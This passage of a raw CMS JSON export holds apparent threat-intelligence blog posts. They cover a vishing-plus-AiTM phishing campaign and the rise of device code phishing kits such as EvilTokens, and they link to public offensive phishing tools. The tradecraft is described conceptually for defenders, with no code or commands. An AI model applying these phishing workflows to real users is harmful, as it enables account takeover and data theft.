convincing.",[],{},{"nodeType":1258,"data":3234,"content":3235},{},[3236,3240,3245,3249,3254,3258,3263],{"nodeType":1257,"value":3237,"marks":3238,"data":3239},"The group recently relaunched its Tor data leak site, which currently lists breaches at ",[],{},{"nodeType":1257,"value":3241,"marks":3242,"data":3244},"Betterment",[3243],{"type":1318},{},{"nodeType":1257,"value":3246,"marks":3247,"data":3248}," (20 million records containing PII), ",[],{},{"nodeType":1257,"value":3250,"marks":3251,"data":3253},"Crunchbase",[3252],{"type":1318},{},{"nodeType":1257,"value":3255,"marks":3256,"data":3257}," (2 million records containing PII), and ",[],{},{"nodeType":1257,"value":3259,"marks":3260,"data":3262},"SoundCloud",[3261],{"type":1318},{},{"nodeType":1257,"value":3264,"marks":3265,"data":3266}," (30 million records containing PII). ",[],{},{"nodeType":1335,"data":3268,"content":3272},{"target":3269},{"sys":3270},{"id":3271,"type":1340,"linkType":1341},"5scKHYJJleNklGAXNKVc7b",[],{"nodeType":1307,"data":3274,"content":3275},{},[],{"nodeType":1311,"data":3277,"content":3278},{},[3279],{"nodeType":1257,"value":3280,"marks":3281,"data":3283},"What’s new?",[3282],{"type":1318},{},{"nodeType":1468,"data":3285,"content":3286},{},[3287],{"nodeType":1257,"value":3288,"marks":3289,"data":3291},"The best of both worlds? Vishing + AiTM phishing",[3290],{"type":1318},{},{"nodeType":1258,"data":3293,"content":3294},{},[3295],{"nodeType":1257,"value":3296,"marks":3297,"data":3298},"SLH and threat actors affiliated with “The Com” are no stranger to voice phishing (vishing) or the use of MFA-bypassing Attacker-in-the-Middle (AitM) phishing kits. ",[],{},{"nodeType":1258,"data":3300,"content":3301},{},[3302,3305,3313],{"nodeType":1257,"value":31,"marks":3303,"data":3304},[],{},{"nodeType":1364,"data":3306,"content":3307},{"uri":3158},[3308],{"nodeType":1257,"value":3309,"marks":3310,"data":3312},"SLH and it’s precursor groups",[3311],{"type":1372},{},{"nodeType":1257,"value":3314,"marks":3315,"data":3316}," leveraged vishing to great success in the form of help desk impersonation and password/MFA reset attacks as seen in the high profile Marks & Spencer, Co-Op, and Jaguar Land Rover attacks in 2025, as well as the Caesars and MGM attacks in 2023. MFA-bypassing phishing techniques have also long been a part of their arsenal, from the 2022 0ktapus phishing campaign to more recent use of modern AiTM phishing kits. ",[],{},{"nodeType":1258,"data":3318,"content":3319},{},[3320],{"nodeType":1257,"value":3321,"marks":3322,"data":3323},"But until now, we haven’t seen them used together. ",[],{},{"nodeType":1335,"data":3325,"content":3328},{"target":3326},{"sys":3327},{"id":1454,"type":1340,"linkType":1341},[],{"nodeType":1335,"data":3330,"content":3334},{"target":3331},{"sys":3332},{"id":3333,"type":1340,"linkType":1341},"1IDsaYD3H5MjvPS4ekcUhU",[],{"nodeType":1258,"data":3336,"content":3337},{},[3338],{"nodeType":1257,"value":3339,"marks":3340,"data":3341},"It makes sense to combine these methods. AiTM phishing kits are flexible, highly customizable, and can be used to target a broad range of apps — including all of the major IdP platforms used for SSO. Vishing on the other hand is proven to increase the effectiveness of social engineering attacks when performed by an effective operator — which SLH are proven to be (helped by predominantly native English speakers making up their membership, along with the use of effective voice phishing tools). ",[],{},{"nodeType":1258,"data":3343,"content":3344},{},[3345],{"nodeType":1257,"value":3346,"marks":3347,"data":3348},"Both vishing and AiTM phishing are identity-first methods that consciously evade traditional security tools and detection controls at the endpoint and network layer. This makes them highly effective in today’s IT environment. ",[],{},{"nodeType":1468,"data":3350,"content":3351},{},[3352],{"nodeType":1257,"value":3353,"marks":3354,"data":3356},"A new kind of operator-driven AiTM kit",[3355],{"type":1318},{},{"nodeType":1258,"data":3358,"content":3359},{},[3360],{"nodeType":1257,"value":3361,"marks":3362,"data":3363},"Another unique part about this campaign is that it uses a “live phishing panel” — i.e. a customizable phishing page controlled by the attacker in real time. This enables attackers to dynamically change what a victim sees on a phishing site while speaking to them on the phone. This allows them to guide victims through each step of the login and MFA authentication process.",[],{},{"nodeType":1258,"data":3365,"content":3366},{},[3367],{"nodeType":1257,"value":3368,"marks":3369,"data":3370},"This is principally to increase the victim’s likelihood of engaging with the phishing page. As you can see in the image below, there are several options that can be presented to the victim — including not just the normal phishing stages of entering credentials and passing MFA checks, but also post-compromise actions (e.g. creating a passkey that would then be controlled by the attacker for persistent access even if an account password is reset). ",[],{},{"nodeType":1335,"data":3372,"content":3376},{"target":3373},{"sys":3374},{"id":3375,"type":1340,"linkType":1341},"73Y2n3tRkGFtfhrA2AVJyv",[],{"nodeType":1258,"data":3378,"content":3379},{},[3380],{"nodeType":1257,"value":3381,"marks":3382,"data":3383},"At the end of the authentication flow, the threat actor can choose to redirect their target to a “support ticket\" closure screen. This allows the threat actor to manually terminate the session once the compromise is complete while providing the targeted user with context that matches the \"IT support\" ruse. This further reduces the likelihood of post-hoc reporting by a suspicious victim.",[],{},{"nodeType":1258,"data":3385,"content":3386},{},[3387,3391,3400],{"nodeType":1257,"value":3388,"marks":3389,"data":3390},"Given that this modular, operator-controlled phishing kit is reportedly available “",[],{},{"nodeType":1364,"data":3392,"content":3394},{"uri":3393},"https://www.okta.com/blog/threat-intelligence/phishing-kits-adapt-to-the-script-of-callers/",[3395],{"nodeType":1257,"value":3396,"marks":3397,"data":3399},"as a service",[3398],{"type":1372},{},{"nodeType":1257,"value":3401,"marks":3402,"data":3403},"” for criminals, we should expect to see much more of this in future. ",[],{},{"nodeType":1468,"data":3405,"content":3406},{},[3407],{"nodeType":1257,"value":3408,"marks":3409,"data":3411},"0ktapus 2.0?",[3410],{"type":1318},{},{"nodeType":1258,"data":3413,"content":3414},{},[3415],{"nodeType":1257,"value":3416,"marks":3417,"data":3418},"As we mentioned earlier, Scattered Spider made their reputation launching phishing attacks against Okta accounts in the 2022 0ktapus campaign. ",[],{},{"nodeType":1258,"data":3420,"content":3421},{},[3422],{"nodeType":1257,"value":3423,"marks":3424,"data":3425},"The vast majority of phishing attacks target IdP accounts because of the widespread access to downstream apps they grant via SSO. ",[],{},{"nodeType":1258,"data":3427,"content":3428},{},[3429,3433,3442],{"nodeType":1257,"value":3430,"marks":3431,"data":3432},"This comes at the same time as ",[],{},{"nodeType":1364,"data":3434,"content":3436},{"uri":3435},"https://www.bleepingcomputer.com/news/security/fake-lastpass-emails-pose-as-password-vault-backup-alerts/",[3437],{"nodeType":1257,"value":3438,"marks":3439,"data":3441},"attackers running campaigns to target LastPass master passwords",[3440],{"type":1372},{},{"nodeType":1257,"value":3443,"marks":3444,"data":3445},". This provides a similar level of access to apps in the form of credentials (and sometimes saved passkeys). ",[],{},{"nodeType":1335,"data":3447,"content":3451},{"target":3448},{"sys":3449},{"id":3450,"type":1340,"linkType":1341},"1vyu5WvdktTnC24TkVFqfs",[],{"nodeType":1258,"data":3453,"content":3454},{},[3455,3459,3468],{"nodeType":1257,"value":3456,"marks":3457,"data":3458},"Not only is this a goldmine for attackers looking to steal data or pivot to other systems to be able to launch further attacks (e.g. pivoting to cloud and on-prem services for ransomware deployment) but it’s a nightmare for incident responders. If an attacker can access an app and create a backdoor login method (AKA. a ",[],{},{"nodeType":1364,"data":3460,"content":3462},{"uri":3461},"https://pushsecurity.com/blog/ghost-logins-when-forgotten-identities-come-back-to-haunt-you/",[3463],{"nodeType":1257,"value":3464,"marks":3465,"data":3467},"ghost login",[3466],{"type":1372},{},{"nodeType":1257,"value":3469,"marks":3470,"data":3471},") it can be very difficult for a security team to identify and clean them up. ",[],{},{"nodeType":1335,"data":3473,"content":3477},{"target":3474},{"sys":3475},{"id":3476,"type":1340,"linkType":1341},"7tILkroPw9w0WLIo1bVV24",[],{"nodeType":1258,"data":3479,"content":3480},{},[3481],{"nodeType":1257,"value":3482,"marks":3483,"data":3484},"Check out the excerpt from one of our recent webinars below for more information. ",[],{},{"nodeType":1335,"data":3486,"content":3490},{"target":3487},{"sys":3488},{"id":3489,"type":1340,"linkType":1341},"5IVkapjwLp1Ys14vXagQRD",[],{"nodeType":1307,"data":3492,"content":3493},{},[],{"nodeType":1311,"data":3495,"content":3496},{},[3497],{"nodeType":1257,"value":3498,"marks":3499,"data":3501},"Impact analysis",[3500],{"type":1318},{},{"nodeType":1258,"data":3503,"content":3504},{},[3505],{"nodeType":1257,"value":3506,"marks":3507,"data":3508},"This combination of methods is likely to increase the success of these malicious campaigns as well as reducing the likelihood of detection. ",[],{},{"nodeType":1258,"data":3510,"content":3511},{},[3512,3516,3524],{"nodeType":1257,"value":3513,"marks":3514,"data":3515},"It’s well documented that modern phishing attacks use a wide and ever-expanding range of ",[],{},{"nodeType":1364,"data":3517,"content":3519},{"uri":3518},"https://pushsecurity.com/blog/phishing-detection-evasion-launch/",[3520],{"nodeType":1257,"value":2684,"marks":3521,"data":3523},[3522],{"type":1372},{},{"nodeType":1257,"value":3525,"marks":3526,"data":3527}," — from implementing legitimate bot protection technologies to prevent analysis, to only loading pages if the correct parameters are met — such as coming through a specific URL redirect path, and adhering to “normal” browser configs (excluding unusual browser window sizes and the presence of security analysis tools).",[],{},{"nodeType":1258,"data":3529,"content":3530},{},[3531],{"nodeType":1257,"value":3532,"marks":3533,"data":3534},"In this case, the malicious payload will only trigger in the event that the delivery is approved by an operator in real time. This means that anyone attempting to find and proactively block a phishing page based on indicators of known-bad is going to have a tough time finding and flagging them. If you haven’t got a community of security analysts sharing and tagging samples of malicious pages, it makes it really hard to find and block them at scale before they hit a victim. And if these convincing attacks aren’t being reported, they’re even less likely to be investigated. This is what we mean when we say that most phishing attacks today are effectively zero-day. ",[],{},{"nodeType":1258,"data":3536,"content":3537},{},[3538,3542,3547,3551,3560],{"nodeType":1257,"value":3539,"marks":3540,"data":3541},"In this case, it’s worth pointing out that the phone call is essentially the delivery vector for the phishing page. This means there’s no email to intercept and analyse. This isn’t new — ",[],{},{"nodeType":1257,"value":3543,"marks":3544,"data":3546},"non-email vectors now account for more than 1 in 3 phishing attacks intercepted by Push",[3545],{"type":1318},{},{"nodeType":1257,"value":3548,"marks":3549,"data":3550},", ",[],{},{"nodeType":1364,"data":3552,"content":3554},{"uri":3553},"https://pushsecurity.com/blog/2025-top-phishing-trends/",[3555],{"nodeType":1257,"value":3556,"marks":3557,"data":3559},"LinkedIn and Google Search being the top culprits",[3558],{"type":1372},{},{"nodeType":1257,"value":3561,"marks":3562,"data":3563},". This effectively cuts out the primary phishing detection surface for most organizations.",[],{},{"nodeType":1258,"data":3565,"content":3566},{},[3567],{"nodeType":1257,"value":3568,"marks":3569,"data":3570},"All this means that unless you’re able to detect and block these attacks in real time, organizations will find themselves unable to counter this evolving threat. ",[],{},{"nodeType":1258,"data":3572,"content":3573},{},[3574],{"nodeType":1257,"value":3575,"marks":3576,"data":3578},"The best/only way to do that is to be in the browser. ",[3577],{"type":1318},{},{"nodeType":1307,"data":3580,"content":3581},{},[],{"nodeType":1311,"data":3583,"content":3584},{},[3585],{"nodeType":1257,"value":3586,"marks":3587,"data":3589},"How Push stops the attack",[3588],{"type":1318},{},{"nodeType":1258,"data":3591,"content":3592},{},[3593],{"nodeType":1257,"value":3594,"marks":3595,"data":3596},"As a browser-based detection and response tool, Push is perfectly positioned to detect and block attacks like this in real-time. ",[],{},{"nodeType":1258,"data":3598,"content":3599},{},[3600],{"nodeType":1257,"value":3601,"marks":3602,"data":3603},"Push harnesses deep browser telemetry to detect and block phishing based on behaviors, not static indicators. By analyzing how phishing pages behave and how users interact with them, Push uncovers fake pages, attempted credential theft, and phishing kits the moment they load in the browser — regardless of the delivery mechanism, and even when the attack has never been seen before. ",[],{},{"nodeType":1335,"data":3605,"content":3609},{"target":3606},{"sys":3607},{"id":3608,"type":1340,"linkType":1341},"2TAKFM1rpETq4KtTY3FPIs",[],{"nodeType":1258,"data":3611,"content":3612},{},[3613],{"nodeType":1257,"value":3614,"marks":3615,"data":3616},"Push's browser-based controls include:",[],{},{"nodeType":1884,"data":3618,"content":3619},{},[3620,3641],{"nodeType":1888,"data":3621,"content":3622},{},[3623],{"nodeType":1258,"data":3624,"content":3625},{},[3626,3629,3637],{"nodeType":1257,"value":31,"marks":3627,"data":3628},[],{},{"nodeType":1364,"data":3630,"content":3632},{"uri":3631},"https://pushsecurity.com/blog/introducing-sso-password-protection/",[3633],{"nodeType":1257,"value":3634,"marks":3635,"data":3636},"Fingerprinting high-risk app passwords",[],{},{"nodeType":1257,"value":3638,"marks":3639,"data":3640}," so they can only be used on a specific domain. Any attempt to reuse this password elsewhere (such as on a phishing site) results in the attempt being blocked. ",[],{},{"nodeType":1888,"data":3642,"content":3643},{},[3644],{"nodeType":1258,"data":3645,"content":3646},{},[3647,3650,3658],{"nodeType":1257,"value":31,"marks":3648,"data":3649},[],{},{"nodeType":1364,"data":3651,"content":3653},{"uri":3652},"https://pushsecurity.com/blog/detecting-and-blocking-phishing-attacks-in-the-browser/",[3654],{"nodeType":1257,"value":3655,"marks":3656,"data":3657},"Multiple browser-based checks",[],{},{"nodeType":1257,"value":3659,"marks":3660,"data":3661}," looking for indicators of bad, such as cloned elements from legitimate websites, and an ever-growing number of detections relating to phishing kit behaviors and attributes as they are rendered on a page. ",[],{},{"nodeType":1335,"data":3663,"content":3667},{"target":3664},{"sys":3665},{"id":3666,"type":1340,"linkType":1341},"4ESxxjTjNwNXGEW4DBcMVV",[],{"nodeType":1258,"data":3669,"content":3670},{},[3671],{"nodeType":1257,"value":3672,"marks":3673,"data":3674},"Because Push observes every login made in the browser, you can also use Push to find identities susceptible to phishing attacks, such as those not using phishing-resistant authentication methods (e.g. passkeys), to proactively improve your account hygiene and reduce your attack surface. ",[],{},{"nodeType":1258,"data":3676,"content":3677},{},[3678,3682,3691,3695,3703],{"nodeType":1257,"value":3679,"marks":3680,"data":3681},"Finally, you can also use our ",[],{},{"nodeType":1364,"data":3683,"content":3685},{"uri":3684},"https://pushsecurity.com/blog/employee-identity-verification-codes-release/",[3686],{"nodeType":1257,"value":3687,"marks":3688,"data":3690},"employee verification codes",[3689],{"type":1372},{},{"nodeType":1257,"value":3692,"marks":3693,"data":3694}," feature as part of a layered defense — a simple, browser-based identity check that gives your employees a reliable way to confirm they’re talking to another employee from your organization. It enables employees to quickly verify that a caller is who they say they are by relaying a rotating 6-digit verification code displayed in every employee's browser via the Push extension. This is an effective way of combating ",[],{},{"nodeType":1364,"data":3696,"content":3697},{"uri":1804},[3698],{"nodeType":1257,"value":3699,"marks":3700,"data":3702},"help desk scams",[3701],{"type":1372},{},{"nodeType":1257,"value":3704,"marks":3705,"data":3706}," too — another favorite of SLH. ",[],{},{"nodeType":1335,"data":3708,"content":3712},{"target":3709},{"sys":3710},{"id":3711,"type":1340,"linkType":1341},"1TEpCjh8UGwmejgYSGC1by",[],{"nodeType":3714,"data":3715,"content":3716},"blockquote",{},[3717],{"nodeType":1258,"data":3718,"content":3719},{},[3720,3724,3732,3735,3743,3747,3754],{"nodeType":1257,"value":3721,"marks":3722,"data":3723},"Want to learn more about Push? ",[],{},{"nodeType":1364,"data":3725,"content":3726},{"uri":2228},[3727],{"nodeType":1257,"value":3728,"marks":3729,"data":3731},"Check out our latest product overview",[3730],{"type":1372},{},{"nodeType":1257,"value":3548,"marks":3733,"data":3734},[],{},{"nodeType":1364,"data":3736,"content":3738},{"uri":3737},"https://pushsecurity.com/product-demo/",[3739],{"nodeType":1257,"value":3740,"marks":3741,"data":3742},"visit our demo library",[],{},{"nodeType":1257,"value":3744,"marks":3745,"data":3746},", or ",[],{},{"nodeType":1364,"data":3748,"content":3749},{"uri":2241},[3750],{"nodeType":1257,"value":2244,"marks":3751,"data":3753},[3752],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":3755,"data":3756},[],{},{"nodeType":1258,"data":3758,"content":3759},{},[3760],{"nodeType":1257,"value":31,"marks":3761,"data":3762},[],{},"Unpacking the latest SLH campaign — combining vishing with AiTM phishing to hijack SSO accounts","Analysing the latest Scattered Lapsus$ Hunters (SLH) phishing campaign targeting hundreds of organizations.\n","2026-01-28T00:00:00.000Z","unpacking-the-latest-slh-campaign",{"items":3768},[3769,3771],{"sys":3770,"name":1270},{"id":1269},{"sys":3772,"name":1274},{"id":1273},{"items":3774},[3775],{"fullName":2265,"firstName":2266,"jobTitle":2267,"profilePicture":3776},{"url":2269},{"items":3778},[3779],{"fullName":3138,"firstName":3139,"jobTitle":3140,"profilePicture":3780},{"url":3142},{"json":3782,"links":6364},{"nodeType":1259,"data":3783,"content":3784},{},[3785,3805,3824,3831,3837,3844,3851,3854,3862,3868,3952,3972,3978,3985,4114,4117,4125,4132,4138,4141,4149,4190,4196,4203,4210,4217,4224,4242,4248,4254,4260,4266,4272,4278,4284,4290,4557,4560,4568,4703,4709,4712,4720,4854,4860,4863,4871,5018,5024,5027,5035,5176,5182,5185,5193,5340,5346,5349,5357,5503,5509,5512,5520,5615,5621,5624,5632,5726,5732,5735,5743,5749,5882,5888,5898,5901,5909,5921,5928,5934,5941,5962,5978,5984,5992,6018,6025,6031,6038,6041,6049,6057,6078,6099,6104,6111,6118,6126,6142,6149,6169,6172,6180,6187,6194,6241,6247,6254,6257,6265,6272,6279,6299,6305,6312,6320,6327],{"nodeType":1258,"data":3786,"content":3787},{},[3788,3792,3801],{"nodeType":1257,"value":3789,"marks":3790,"data":3791},"The OAuth 2.0 ",[],{},{"nodeType":1364,"data":3793,"content":3795},{"uri":3794},"https://www.rfc-editor.org/rfc/rfc8628",[3796],{"nodeType":1257,"value":3797,"marks":3798,"data":3800},"device authorization grant",[3799],{"type":1372},{},{"nodeType":1257,"value":3802,"marks":3803,"data":3804}," was designed to enable input-constrained devices to sign-in to apps by asking the user to complete the login on a separate device by entering a code. But today, it’s mainly used when accessing CLI tools, meaning that many users encounter the device code flow daily. ",[],{},{"nodeType":1258,"data":3806,"content":3807},{},[3808,3811,3820],{"nodeType":1257,"value":31,"marks":3809,"data":3810},[],{},{"nodeType":1364,"data":3812,"content":3814},{"uri":3813},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/device_code_phishing/description.md",[3815],{"nodeType":1257,"value":3816,"marks":3817,"data":3819},"Device code phishing",[3818],{"type":1372},{},{"nodeType":1257,"value":3821,"marks":3822,"data":3823}," attacks designed to exploit this authorization flow are not new — it was among the first techniques that we added to the SaaS attacks matrix back in 2023. But it’s taken until now for it to really enter mainstream adoption. ",[],{},{"nodeType":1258,"data":3825,"content":3826},{},[3827],{"nodeType":1257,"value":3828,"marks":3829,"data":3830},"The technique tricks a user into issuing access tokens for an attacker-controlled application (not a device, confusingly). Any app that supports device code logins can be a target. Popular examples include Microsoft, Google, Salesforce, GitHub, and AWS. That said, Microsoft is, as always, much more heavily targeted at scale now than any other app.",[],{},{"nodeType":1335,"data":3832,"content":3836},{"target":3833},{"sys":3834},{"id":3835,"type":1340,"linkType":1341},"Al0pGH8vmOYiufDFiAbt0",[],{"nodeType":1258,"data":3838,"content":3839},{},[3840],{"nodeType":1257,"value":3841,"marks":3842,"data":3843},"We’ve always been surprised that attackers haven’t commonly used device code phishing in their standard toolkit, preferring session-stealing AITM phishing and other social engineering attacks like ClickFix. But it’s pretty clear from the recent data that the shift to mainstream adoption has now happened. ",[],{},{"nodeType":1258,"data":3845,"content":3846},{},[3847],{"nodeType":1257,"value":3848,"marks":3849,"data":3850},"In this blog post, we’ll explore the history of device code phishing, what’s changed for it to enter mainstream adoption, how it works under the hood (with recent examples), and what security teams can do about it. ",[],{},{"nodeType":1307,"data":3852,"content":3853},{},[],{"nodeType":1311,"data":3855,"content":3856},{},[3857],{"nodeType":1257,"value":3858,"marks":3859,"data":3861},"A brief history of device code phishing",[3860],{"type":1318},{},{"nodeType":1335,"data":3863,"content":3867},{"target":3864},{"sys":3865},{"id":3866,"type":1340,"linkType":1341},"6u3DgvSGChtTJu7l9I7PG1",[],{"nodeType":1258,"data":3869,"content":3870},{},[3871,3875,3884,3888,3897,3901,3910,3914,3923,3927,3936,3939,3948],{"nodeType":1257,"value":3872,"marks":3873,"data":3874},"The technique was first documented in 2020, before Secureworks released the first tooling framework ",[],{},{"nodeType":1364,"data":3876,"content":3878},{"uri":3877},"https://github.com/secureworks/PhishInSuits",[3879],{"nodeType":1257,"value":3880,"marks":3881,"data":3883},"PhishInSuits",[3882],{"type":1372},{},{"nodeType":1257,"value":3885,"marks":3886,"data":3887}," a year later. A host of research followed, including ",[],{},{"nodeType":1364,"data":3889,"content":3891},{"uri":3890},"https://github.com/secureworks/squarephish",[3892],{"nodeType":1257,"value":3893,"marks":3894,"data":3896},"SquarePhish",[3895],{"type":1372},{},{"nodeType":1257,"value":3898,"marks":3899,"data":3900}," v1 (using QR codes to trigger the 15 minute code expiration window), Dirk-Jan Mollema’s ",[],{},{"nodeType":1364,"data":3902,"content":3904},{"uri":3903},"https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/",[3905],{"nodeType":1257,"value":3906,"marks":3907,"data":3909},"key research",[3908],{"type":1372},{},{"nodeType":1257,"value":3911,"marks":3912,"data":3913}," (chaining device code phishing via Microsoft apps into Primary Refresh Token (PRT) acquisition to gain full browser-level access) and Dennis Kniep’s ",[],{},{"nodeType":1364,"data":3915,"content":3917},{"uri":3916},"https://github.com/denniskniep/DeviceCodePhishing",[3918],{"nodeType":1257,"value":3919,"marks":3920,"data":3922},"DeviceCodePhishing tool",[3921],{"type":1372},{},{"nodeType":1257,"value":3924,"marks":3925,"data":3926}," which automates the entire flow with a headless browser. (Other recent noteworthy tools include ",[],{},{"nodeType":1364,"data":3928,"content":3930},{"uri":3929},"https://github.com/nromsdahl/squarephish2",[3931],{"nodeType":1257,"value":3932,"marks":3933,"data":3935},"SquarePhish2",[3934],{"type":1372},{},{"nodeType":1257,"value":1703,"marks":3937,"data":3938},[],{},{"nodeType":1364,"data":3940,"content":3942},{"uri":3941},"https://github.com/praetorian-inc/GitPhish",[3943],{"nodeType":1257,"value":3944,"marks":3945,"data":3947},"GitPhish",[3946],{"type":1372},{},{"nodeType":1257,"value":3949,"marks":3950,"data":3951},", so shout out to those too). ",[],{},{"nodeType":1258,"data":3953,"content":3954},{},[3955,3959,3968],{"nodeType":1257,"value":3956,"marks":3957,"data":3958},"It wasn’t until August 2024 that in-the-wild exploitation was first identified, with Russia-linked campaigns then continuing into 2025 before entering mainstream criminal adoption. This trend has continued to gather momentum in 2026 with ",[],{},{"nodeType":1364,"data":3960,"content":3962},{"uri":3961},"https://thehackernews.com/2026/03/device-code-phishing-hits-340-microsoft.html",[3963],{"nodeType":1257,"value":3964,"marks":3965,"data":3967},"EvilTokens",[3966],{"type":1372},{},{"nodeType":1257,"value":3969,"marks":3970,"data":3971},", the first reported criminal PhaaS kit for device code phishing, already powering massive campaigns after launching in February. ",[],{},{"nodeType":1335,"data":3973,"content":3977},{"target":3974},{"sys":3975},{"id":3976,"type":1340,"linkType":1341},"6xsfmbYEzpW7CdDiNzO6cu",[],{"nodeType":1258,"data":3979,"content":3980},{},[3981],{"nodeType":1257,"value":3982,"marks":3983,"data":3984},"Some of the noteworthy in-the-wild campaigns include:",[],{},{"nodeType":1884,"data":3986,"content":3987},{},[3988,4020,4040],{"nodeType":1888,"data":3989,"content":3990},{},[3991],{"nodeType":1258,"data":3992,"content":3993},{},[3994,3998,4005,4008,4016],{"nodeType":1257,"value":3995,"marks":3996,"data":3997},"Storm-2372, tracked by ",[],{},{"nodeType":1364,"data":3999,"content":4001},{"uri":4000},"https://www.microsoft.com/en-us/security/blog/2025/02/13/storm-2372-conducts-device-code-phishing-campaign/",[4002],{"nodeType":1257,"value":2027,"marks":4003,"data":4004},[],{},{"nodeType":1257,"value":1703,"marks":4006,"data":4007},[],{},{"nodeType":1364,"data":4009,"content":4011},{"uri":4010},"https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/",[4012],{"nodeType":1257,"value":4013,"marks":4014,"data":4015},"Volexity",[],{},{"nodeType":1257,"value":4017,"marks":4018,"data":4019},", linked to multiple Russia-aligned clusters, combining spear-phishing and social engineering with device code phishing payloads against strategic intelligence targets.",[],{},{"nodeType":1888,"data":4021,"content":4022},{},[4023],{"nodeType":1258,"data":4024,"content":4025},{},[4026,4030,4036],{"nodeType":1257,"value":4027,"marks":4028,"data":4029},"The massive Salesforce campaign operated by ",[],{},{"nodeType":1364,"data":4031,"content":4032},{"uri":3158},[4033],{"nodeType":1257,"value":3161,"marks":4034,"data":4035},[],{},{"nodeType":1257,"value":4037,"marks":4038,"data":4039}," (SLH) combined vishing with a device code phishing payload targeting Salesforce. The attacks morphed into a broader supply chain campaign using stolen credentials, ultimately resulting in 1000+ organizations being compromised and over 1.5 billion stolen records claimed. ",[],{},{"nodeType":1888,"data":4041,"content":4042},{},[4043],{"nodeType":1258,"data":4044,"content":4045},{},[4046,4050,4058,4062,4071,4075,4084,4088,4097,4101,4110],{"nodeType":1257,"value":4047,"marks":4048,"data":4049},"A massive spike in activity in late 2025 and 2026. This includes ",[],{},{"nodeType":1364,"data":4051,"content":4053},{"uri":4052},"https://www.proofpoint.com/us/blog/threat-insight/access-granted-phishing-device-code-authorization-account-takeover",[4054],{"nodeType":1257,"value":4055,"marks":4056,"data":4057},"multiple threat clusters",[],{},{"nodeType":1257,"value":4059,"marks":4060,"data":4061}," tracked using device code phishing techniques, more ",[],{},{"nodeType":1364,"data":4063,"content":4065},{"uri":4064},"https://www.bleepingcomputer.com/news/security/hackers-target-microsoft-entra-accounts-in-device-code-vishing-attacks/",[4066],{"nodeType":1257,"value":4067,"marks":4068,"data":4070},"criminal operations linked to SLH",[4069],{"type":1372},{},{"nodeType":1257,"value":4072,"marks":4073,"data":4074},", and ",[],{},{"nodeType":1364,"data":4076,"content":4078},{"uri":4077},"https://newtonpaul.com/blog/device-code-phish-update/",[4079],{"nodeType":1257,"value":4080,"marks":4081,"data":4083},"hundreds of organizations being targeted via PhaaS architecture,",[4082],{"type":1372},{},{"nodeType":1257,"value":4085,"marks":4086,"data":4087}," which looks to be the same campaign as the recently uncovered EvilTokens PhaaS reported by ",[],{},{"nodeType":1364,"data":4089,"content":4091},{"uri":4090},"https://www.huntress.com/blog/railway-paas-m365-token-replay-campaign",[4092],{"nodeType":1257,"value":4093,"marks":4094,"data":4096},"Huntress",[4095],{"type":1372},{},{"nodeType":1257,"value":4098,"marks":4099,"data":4100}," (featuring abuse of the Railway PaaS platform). Abnormal has also reported on a closed-source PhaaS kit called ",[],{},{"nodeType":1364,"data":4102,"content":4104},{"uri":4103},"https://abnormal.ai/blog/venom-phishing-campaign-mfa-credential-theft",[4105],{"nodeType":1257,"value":4106,"marks":4107,"data":4109},"Venom",[4108],{"type":1372},{},{"nodeType":1257,"value":4111,"marks":4112,"data":4113}," that offers device code phishing capabilities that appear visually and functionally similar to EvilTokens.   ",[],{},{"nodeType":1307,"data":4115,"content":4116},{},[],{"nodeType":1311,"data":4118,"content":4119},{},[4120],{"nodeType":1257,"value":4121,"marks":4122,"data":4124},"What we’re seeing in the wild",[4123],{"type":1318},{},{"nodeType":1258,"data":4126,"content":4127},{},[4128],{"nodeType":1257,"value":4129,"marks":4130,"data":4131},"As mentioned, we’ve also seen a huge spike in device code phishing activity this year, with multiple kits, page designs, and lure types. We’ve identified 10 distinct kits in circulation in the wild, with EvilTokens being the most prevalent. It’s clear that attackers are both spinning up their own kits and creative derivatives of others — we’ve seen kits that are visually similar to EvilTokens (close enough to be clones or forks) but with very different backends, for example AWS, Digital Ocean, 2cloud, and more. ",[],{},{"nodeType":1335,"data":4133,"content":4137},{"target":4134},{"sys":4135},{"id":4136,"type":1340,"linkType":1341},"nJCbTw85GKXdqrlIkzZwi",[],{"nodeType":1307,"data":4139,"content":4140},{},[],{"nodeType":1468,"data":4142,"content":4143},{},[4144],{"nodeType":1257,"value":4145,"marks":4146,"data":4148},"“ANTIBOT” (EvilTokens)",[4147],{"type":1318},{},{"nodeType":1258,"data":4150,"content":4151},{},[4152,4155,4162,4165,4174,4178,4186],{"nodeType":1257,"value":31,"marks":4153,"data":4154},[],{},{"nodeType":1364,"data":4156,"content":4157},{"uri":4090},[4158],{"nodeType":1257,"value":4093,"marks":4159,"data":4161},[4160],{"type":1372},{},{"nodeType":1257,"value":3548,"marks":4163,"data":4164},[],{},{"nodeType":1364,"data":4166,"content":4168},{"uri":4167},"https://blog.sekoia.io/new-widespread-eviltokens-kit-device-code-phishing-as-a-service-part-1/",[4169],{"nodeType":1257,"value":4170,"marks":4171,"data":4173},"Sekoia",[4172],{"type":1372},{},{"nodeType":1257,"value":4175,"marks":4176,"data":4177},", and researcher ",[],{},{"nodeType":1364,"data":4179,"content":4180},{"uri":4077},[4181],{"nodeType":1257,"value":4182,"marks":4183,"data":4185},"Paul Newton",[4184],{"type":1372},{},{"nodeType":1257,"value":4187,"marks":4188,"data":4189}," have already done a great job of providing IOCs for the recent EvilTokens activity spike, including multiple backend Railway IPs in authentication events. ",[],{},{"nodeType":1335,"data":4191,"content":4195},{"target":4192},{"sys":4193},{"id":4194,"type":1340,"linkType":1341},"1XNviq5OvMf5TEAc59F6g5",[],{"nodeType":1258,"data":4197,"content":4198},{},[4199],{"nodeType":1257,"value":4200,"marks":4201,"data":4202},"Beyond the most widely observed implementation featuring a Cloudflare Workers frontend and Railway backend for authentication, we’ve also tracked additional versions of EvilTokens in circulation since January 2026 (many of which remain live along with the current “production” version of the kit). ",[],{},{"nodeType":1258,"data":4204,"content":4205},{},[4206],{"nodeType":1257,"value":4207,"marks":4208,"data":4209},"You can see an evolution of the kit in the videos and screenshots below, from early precursors seen in mid-January, the first mentions of ANTIBOT in the page code in late-January, the parallel development of a “Courts Access” fork that lacks the ANTIBOT references, and finally production EvilTokens in February. One of the key threads between the versions is the presence of a generateFallbackCode() JS function and use of a /generate-codes API call. 